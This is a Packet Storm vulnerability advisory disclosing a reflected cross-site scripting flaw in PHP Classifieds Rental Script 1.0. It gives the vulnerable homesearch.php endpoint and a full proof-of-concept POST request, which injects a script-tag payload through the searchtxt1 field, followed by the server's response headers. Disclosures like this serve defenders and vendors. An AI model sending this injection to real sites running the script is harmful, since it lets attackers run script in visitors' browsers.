PHP Classifieds Rental Script 1.0 Cross Site Scripting

2016-11-09T00:00:00
ID PACKETSTORM:139638
Type packetstorm
Reporter Nassim Asrir
Modified 2016-11-09T00:00:00

Description

                                        
                                            `[x]========================================================================================================================================[x]  
| Title : PHP Classifieds Rental Script Cross-Site Scripting  
| Software : PHP Classifieds Rental Script  
| Vendor : http://www.i-netsolution.com/  
| Demo : http://www.i-netsolution.com/item/php-classifieds-rental-script/244993  
| Date : 06 October 2016  
  
Version Affected: v1.0| Author : Nassim Asrir  
| Team : HenceForth  
| Email : wassline@gmail.com  
[x]========================================================================================================================================[x]  
  
  
  
[x]========================================================================================================================================[x]  
| Technology : PHP  
| Database : MySQL  
| Price : $ 99  
| Description : PHP Classifieds Rental Script The PHP Rental Classifieds Script is one among the limited software's, which are designed  
so user-friendly that anyone with minimal knowledge of operating a computer can utilize it to its optimum. Besides being  
an easy-to- use software, this Property Rental Script  
[x]========================================================================================================================================[x]  
[x]========================================================================================================================================[x]  
| Exploit : http://localhost/script/homesearch.php[x========================================================================================================================================[x]  
[x]========================================================================================================================================[x]  
| Proof of concept :   
  
Method: POST  
  
HTTP Headers:  
########################################################################################################  
http://localhost/script/homesearch.php  
POST /~classifiedscript//homesearch.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/script/homesearch.php  
Cookie: PHPSESSID=e360d6bcbdcc783367cc224a2d49e5af; dcjq-accordion=  
Connection: keep-alive  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 111  
searchtxt1="><script>alert("XSSED");</script>&searchtxt2=Where%3F&prdtsearch.x=62&prdtsearch.y=17  
#########################################################################################################  
HTTP/1.1 200 OK  
Date: Thu, 06 Oct 2016 14:49:53 GMT  
Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips mod_bwlimited/1.4  
X-Powered-By: PHP/5.4.45  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
Pragma: no-cache  
Keep-Alive: timeout=5, max=100  
Connection: Keep-Alive  
Transfer-Encoding: chunked  
Content-Type: text/html  
##########################################################################################################  
[x]========================================================================================================================================[x]   
[x]========================================================================================================================================[x]  
| Greetz : To all Hackerz.   
[x]========================================================================================================================================[x]  
  
`